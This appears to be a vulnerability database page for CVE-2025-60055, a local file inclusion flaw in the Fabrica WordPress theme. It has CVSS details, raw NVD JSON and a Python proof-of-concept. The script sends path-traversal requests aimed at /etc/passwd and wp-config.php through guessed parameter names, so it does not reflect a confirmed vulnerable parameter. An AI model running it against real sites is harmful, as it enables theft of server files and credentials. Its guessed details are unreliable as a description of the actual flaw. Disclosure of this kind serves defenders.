Security Vulnerability Report
中文
CVE-2025-60055 CVSS 8.1 HIGH

CVE-2025-60055

Published: 2025-12-18 08:16:05
Last Modified: 2026-04-27 18:16:23

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Fabrica fabrica allows PHP Local File Inclusion.This issue affects Fabrica: from n/a through <= 1.8.1.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

AncoraThemes Fabrica <= 1.8.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60055 Fabrica Theme LFI PoC # Target: WordPress site with Fabrica theme <= 1.8.1 import requests import sys def test_lfi(target_url, file_path='/etc/passwd'): """Test for Local File Inclusion vulnerability in Fabrica theme""" # Common vulnerable parameters in Fabrica theme vulnerable_params = [ 'file', 'template', 'page', 'view', 'load', 'include' ] # Try to read sensitive files test_files = [ '/etc/passwd', '../../../../wp-config.php', '../../../wp-config.php', '/var/www/html/wp-config.php' ] print(f"[*] Testing target: {target_url}") print(f"[*] Attempting to read: {file_path}") for param in vulnerable_params: for test_file in test_files: try: # Encode path traversal payload = {param: test_file} response = requests.get(target_url, params=payload, timeout=10) # Check if file content is leaked if response.status_code == 200: if 'root:' in response.text or 'wp_' in response.text: print(f"[!] VULNERABLE! Parameter: {param}") print(f"[!] Payload: {test_file}") print(f"[+] File content preview:\n{response.text[:500]}") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") print("[-] No LFI vulnerability detected") return False if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python poc.py <target_url>") print("Example: python poc.py http://victim.com/wp-content/themes/fabrica/") sys.exit(1) target = sys.argv[1] test_lfi(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60055", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:05.250", "lastModified": "2026-04-27T18:16:23.127", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Fabrica fabrica allows PHP Local File Inclusion.This issue affects Fabrica: from n/a through <= 1.8.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/fabrica/vulnerability/wordpress-fabrica-theme-1-8-1-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}